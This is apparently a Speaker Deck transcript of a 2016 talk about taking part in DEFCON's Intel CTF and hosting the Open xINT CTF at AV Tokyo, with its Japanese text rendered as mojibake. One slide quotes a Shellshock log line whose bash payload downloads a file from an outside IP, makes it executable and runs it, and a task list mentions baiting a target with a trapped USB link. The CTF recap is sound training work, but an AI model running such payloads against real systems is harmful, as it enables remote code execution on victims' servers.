Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Intel CTF and Open xINT CTF 20161220

Yuho Kameda
December 20, 2016

Intel CTF and Open xINT CTF 20161220

OSINTのCTFに参加して開催した話で! 2016/12/20 #ssmjp

Yuho Kameda

December 20, 2016
Tweet

More Decks by Yuho Kameda

Other Decks in Technology

Transcript

  1. OSINTͷCTFʹ
    ࢀՃͯ͠։࠵ͨ͠࿩Ͱʂ
    2016/12/20 #ssmjp @YuhoKameda
    ɹɹɹɹɹɹɹɹɹ @pinja_xyz

    View full-size slide

  2. ࣗݾ঺հ
    ُా ༐า : ykame (@YuhoKameda)
    ZAP Evangelist
    OSINT
    ओͳۀ຿಺༰
    WebΞϓϦέʔγϣϯ੬ऑੑ਍அ
    ϓϥοτϑΥʔϜ੬ऑੑ਍அ
    SOC/CSIRTۀ຿
    ۓٸҊ݅ͳΜͰ΋ཁһ…
    ৘ใऩू

    View full-size slide

  3. ࠓ೔࿩͢͜ͱ
    DEFCONͰIntel CTFʹࢀՃͨ͠࿩
    AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠࿩

    View full-size slide

  4. DEFCONͰIntel CTFʹ
    ࢀՃͨ͠࿩

    View full-size slide

  5. DEFCONͰIntel CTF
    DEFCONͬͯͳʔʹʁ
    ຖ೥ՆʹϥεϕΨεͰ։࠵
    BlackHatʹଓ͚ͯ։࠵
    ༷ʑͳCTF΍ίϯςετ͕͋ΔϋοΧʔ
    ͷࡇయ

    View full-size slide

  6. DEFCONͰIntel CTF
    Intel CTFͬͯͳʔʹʁ
    2015೥͔Β࢝·ͬͨɺIntelligenceʹয఺Λ౰ͯͨ
    ڝٕ
    ୈ2ճ(2016೥)ͷςʔϚ͸ɺੈքͷTop50ʹೖΔا
    ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ
    ௥੻͍ͯ͘͠աఔͰ༷ʑͳ໰୊Λճ౴͢Δ
    ༏উ৆ۚ͸$2,500
    pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me)
    ݁Ռ͸12ҐͰͨ͠

    View full-size slide

  7. Intel CTFͷ݁Ռ

    View full-size slide

  8. ͲΜͳ໰୊͕͋ͬͨͷʔʁ
    1໰໨ The Vuln:
    What is the vulnerability that was
    successfully exploited also "known" as?
    4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔
    Βɺ߈ܸʹ੒ޭͨ͠1ߦΛݟ͚ͭΔ
    XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/?
    id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O /
    tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http://
    52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ;
    rm -rf /tmp/*'"

    View full-size slide

  9. 1໰໨ͷ౴͑͸ʁ
    What is the vulnerability that was successfully
    exploited also "known" as?
    ͳ͔ͳ͔౴͕͑߹Θͳ͍…
    Shellshock?
    shellshock?

    View full-size slide

  10. 1໰໨ͷ౴͑͸ʁ
    What is the vulnerability that was successfully
    exploited also "known" as?
    ͳ͔ͳ͔౴͕͑߹Θͳ͍…
    Shellshock?
    shellshock?
    Bashbug?
    CVE-2014-6271?

    View full-size slide

  11. 1໰໨ͷ౴͑͸ʁ
    What is the vulnerability that was successfully
    exploited also "known" as?
    ͳ͔ͳ͔౴͕͑߹Θͳ͍…
    Shellshock?
    shellshock?
    Bashbug?
    CVE-2014-6271?
    ౴͑͸ʮBashdoorʯ

    View full-size slide

  12. ͦͷଞͷ໰୊

    Ϛϧ΢ΣΞͷ௨৴ઌ͸ʁ
    ߈ܸݩIPͷASN(Autonomous System Number)͸ʁ
    ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯ͸ʁ

    Ϛϧ΢ΣΞͷ໊લ͸ʁ
    ࢖༻͕ແޮԽ͞Ε͍ͯΔؔ਺໊͸ʁ
    Ϙοτͷ໊લ͸ʁ
    Bot Harder͕࢖༻Δ͢ΔMaildrop͸ʁ

    View full-size slide

  13. ଞʹ΋͋ΔSocial Engineering CTF(SECTF)
    ࣮ࡍͷاۀ΁ి࿩ͯ͠৘ใࡡऔ͢Δڝٕ
    Black Badge΋໯͑Δ໨ۄίϯςετ
    blog.yka.me Ͱɺ2015೥ͷ৘ใΛupͯ͠·͢
    http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html

    View full-size slide

  14. AV TokyoͰOpen xINT CTFΛ
    ։࠵ͨ͠࿩

    View full-size slide

  15. AV Tokyoͬͯͳʔʹʁ
    ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ
    ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ
    ϋοΧʔίϛϡχςΟ
    no drink! no hack!

    View full-size slide

  16. Ԡื·ͰͷྲྀΕ
    8/6 20:00 ʮOSINTؔ܎ͷCTF͸೔ຊͰ΋΍Γ͍ͨͰ͢Ͷʯ
    ʮձࣾؔ܎ͩͱ಺༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ
    ʮʒ੾(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ
    8/7 10:00
    ɹɹʙ16:00
    Intel CTFڝٕࢀՃ
    8/8 13:19 writeupΛڞ༗
    8/8 22:26 Call For Xͷจষୟ͖୆
    8/12 Call For Xఏग़done

    View full-size slide

  17. ࣮ࡍʹ։࠵ͯ͠Έͨ
    10/22 15:00 - 19:30 @ौ୩

    View full-size slide

  18. Open xINT CTFͱ͸ʁ http://xintctf.wpblog.jp/
    ձ৔Ͱͷؔ܎ऀ΁ͷฉ͖ࠐΈ΍SNSͳͲͰඞཁͳ৘ใΛऩ
    ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ
    ண͘ɺݱ୅ͷεύΠཆ੒ίϯςετ
    ࢀՃऀ(εύΠ)
    ߈ܸऀΛௐࠪ
    (ผͷεύΠ)
    ߈ܸऀ(ϋοΧʔ)
    ઀৮
    USB୳ࡧґཔ
    USBʹ᠘Λ࢓ࠐΜͰ઀৮
    ಠࣗʹௐࠪ

    View full-size slide

  19. ໰୊͸7໰
    1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨε͸ʁ
    2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧ΢ϯτ͸ʁ
    3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪ͸ʁ
    4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧ΢ϯτ
    ͸ʁ
    5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV Tokyo಺Ͱ઀৮ͯ͠ʮ͏·
    ͘৴༻ͤͯ͞ʯ৘ใΛҾ͖ग़ͤ
    6. εύΠ͔ΒҾ͖ग़ͨ͠৘ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ
    ৘ใΛݟ͚ͭΖ
    7. ͦͷϞϊʹ᠘ϦϯΫΛ࢓ֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ
    ʹAV Tokyo಺ͰʮϞϊʯΛ౉ͤ

    View full-size slide

  20. ͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ
    MAMORIOΞϓϦͰ൓ԠνΣοΫ
    http://www.mamorio.jp/
    ΞϓϦͰ൓Ԡͷ͋ͬͨ෇ۙΛ୳͢

    View full-size slide

  21. ৄ͘͠͸ࢀՃऀͷwriteupΛʂ
    ΤΫετϦʔϜCTF͸ͭΒ͍ʢOpen xINT
    ͷWriteup?ʣ
    http://pinksawtooth.hatenablog.com/
    entry/2016/10/24/010049
    Open xINT CTF Writeup
    http://qiita.com/nicklegr/items/
    5ebcdaac86a21613c94a

    View full-size slide

  22. ࢀՃऀ਺ : 93ਓ
    1໰Ͱ΋ղ͚ͨਓ : 67ਓճ౴෼෍
    1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4: 28ਓɺ5: 7ਓ

    View full-size slide

  23. ࠷ऴతͳ݁Ռ͸ʁ (700఺Ҏ্) [߹ܭ఺਺ + εύΠಘ఺ + ࠷ऴճ౴࣌ؒ]
    Sh1n0g1ɹ900 +ʢ100ʣ18:45:56
    tigerszkɹ900 +ʢ100ʣ 19:20:49
    rcsirtɹ900 +ʢ0ʣ17:16:36
    nicklegrɹ700 +ʢ200ʣ17:39:52
    brightblueɹ900 +ʢ0ʣ19:25:33
    TomoriNaoɹ700 +ʢ100ʣ17:20:22
    tonko2ɹ600 +ʢ100ʣ17:11:11
    Sakura Ayaneɹ700 +ʢ0ʣ17:31:46
    ໊લ͕ొ࿥໊ͱҰக͠ͳ͍ํ͸εύΠಘ఺͕0఺ͱͳΓ·͢
    ಉ఺ͷ৔߹ɺ࠷ऴճ౴͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢

    View full-size slide